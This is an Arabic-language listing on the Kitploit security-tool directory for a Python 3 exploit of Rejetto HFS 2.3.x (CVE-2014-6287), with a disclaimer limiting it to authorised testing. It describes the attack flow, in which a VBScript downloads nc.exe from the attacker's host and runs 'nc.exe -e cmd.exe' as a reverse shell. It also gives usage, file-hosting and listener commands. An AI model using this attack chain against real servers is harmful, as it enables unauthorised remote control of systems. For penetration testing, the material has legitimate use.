Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
rejjeto_hfs-rce-exploit-cve-2014-6287 — استغلال تنفيذ الأوامر عن بعد لخادم ملفات HTTP من Rejetto الإصدار 2.3.x (CVE-2014-6287) معاد كتابته بلغة Python 3 لاختبار الأمان الهجومي الحديث. | Kitploit
أدوات/GitHubGitHub/joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالتعلم والتعليمأداة الوصول عن بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
joaz94/rejjeto_hfs-rce-exploit-cve-2014-6287

rejjeto_hfs-rce-exploit-cve-2014-6287

استغلال تنفيذ الأوامر عن بعد لخادم ملفات HTTP من Rejetto الإصدار 2.3.x (CVE-2014-6287) معاد كتابته بلغة Python 3 لاختبار الأمان الهجومي الحديث.

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

استغلال تنفيذ الأوامر عن بُعد في HFS (CVE-2014-6287)

هذه إعادة كتابة بلغة Python 3 للاستغلال الكلاسيكي لتنفيذ الأوامر عن بُعد (RCE) الذي يستهدف Rejetto HTTP File Server (HFS) الإصدار 2.3.x، مستفيدًا من الثغرة المعروفة باسم CVE-2014-6287.

اكتُشفت في الأصل بواسطة Avinash Kumar Thapa المعروف بـ "-Acid"، وتعمل هذه النسخة على تحسين قابلية النقل وسهولة الاستخدام، مع توفير معلمة كاملة وتوافق حديث.


⚠️ إخلاء مسؤولية

تم توفير هذه الأداة حصريًا للأغراض التعليمية واختبار الاختراق المصرح به. الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها غير قانوني وغير أخلاقي.


📌 تفاصيل الاستغلال

  • الثغرة: Rejetto HFS v2.3.x - تنفيذ الأوامر عن بُعد
  • CVE: CVE-2014-6287
  • التأثير: تنفيذ الأوامر عن بُعد بصلاحيات النظام
  • المتطلب: يجب أن يكون الهدف يعمل بنسخة ضعيفة من HFS مع تمكين النصوص البرمجية.

🚀 الميزات

  • متوافق بالكامل مع Python 3
  • يقبل جميع المعاملات الرئيسية عبر سطر الأوامر:
    • IP الهدف والمنفذ
    • IP المحلي (المهاجم)
    • منفذ الاستماع للـ reverse shell
    • المنفذ المستخدم لاستضافة nc.exe
  • لا توجد قيم ثابتة
  • تسليم reverse shell كلاسيكي باستخدام nc.exe عبر VBScript
  • تدفق الاستغلال:
    1. رفع نص VBScript لتحميل nc.exe
    2. تنفيذ النص على الهدف
    3. تشغيل nc.exe -e cmd.exe لإنشاء reverse shell

🛠️ الاستخدام

root@kitploit:~
python3 exploit.py <TARGET_IP> <TARGET_PORT> <LOCAL_IP> <LISTEN_LOCAL_PORT> <NC_DOWNLOAD_PORT>

مثال:
python3 exploit.py 192.168.1.10 80 192.168.1.5 4444 8000

المتطلبات:
  - خادم HTTP يقدم nc.exe:
      python3 -m http.server 8000
  - مستمع:
      nc -lvnp 4444
تنزيل الأداة